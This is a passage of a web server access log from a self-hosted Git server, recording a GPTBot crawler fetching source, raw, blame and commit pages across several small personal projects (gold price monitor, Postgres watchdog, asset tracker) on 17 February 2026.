"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" -[17/Feb/2026:14:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11326] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" -[17/Feb/2026:14:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10488] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:14:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 12369] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:14:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 2135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" -[17/Feb/2026:14:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 11459] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:14:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14346] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" -[17/Feb/2026:14:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 18096] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:14:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:14:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10395] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 36212] [Gzip 15.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:14:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14347] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" -[17/Feb/2026:14:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 11628] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:14:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:14:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 10583] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" [Client 74.7.227.38] [Length 769] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:14:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" -[17/Feb/2026:14:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10859] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" -[17/Feb/2026:14:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" -[17/Feb/2026:14:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10830] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog" -[17/Feb/2026:14:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 10493] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assets_data.csv" -[17/Feb/2026:14:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10860] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:14:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 626375] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 626452] [Gzip 15.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:14:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10010] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" -[17/Feb/2026:14:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 9977] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" -[17/Feb/2026:14:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10466] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" -[17/Feb/2026:14:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" -[17/Feb/2026:14:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" -[17/Feb/2026:14:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" -[17/Feb/2026:14:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14348] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/my_database.db" -[17/Feb/2026:14:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14347] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/my_database.db" -[17/Feb/2026:14:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 5813273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 5813273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10125618] [Gzip 22.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10125675] [Gzip 22.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:14:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" -[17/Feb/2026:14:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" -[17/Feb/2026:14:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:14:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:14:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" -[17/Feb/2026:14:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:14:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 